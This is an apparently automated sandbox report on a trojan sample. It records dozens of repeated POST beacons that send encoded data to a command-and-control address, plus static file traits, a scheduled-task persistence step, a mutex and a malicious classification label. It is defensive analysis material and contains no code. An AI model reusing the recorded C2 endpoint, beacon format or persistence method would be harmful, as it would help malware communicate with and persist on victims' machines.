                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

                  System Summary

                  barindex
                  PE file contains section with special chars
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: file.exeStatic PE information: Section: ZLIB complexity 0.9970516859673024
                  Source: file.exeStatic PE information: Section: hsrzezej ZLIB complexity 0.9945219054562906
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9970516859673024
                  Source: axplong.exe.0.drStatic PE information: Section: hsrzezej ZLIB complexity 0.9945219054562906
                  Source: axplong.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                  Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
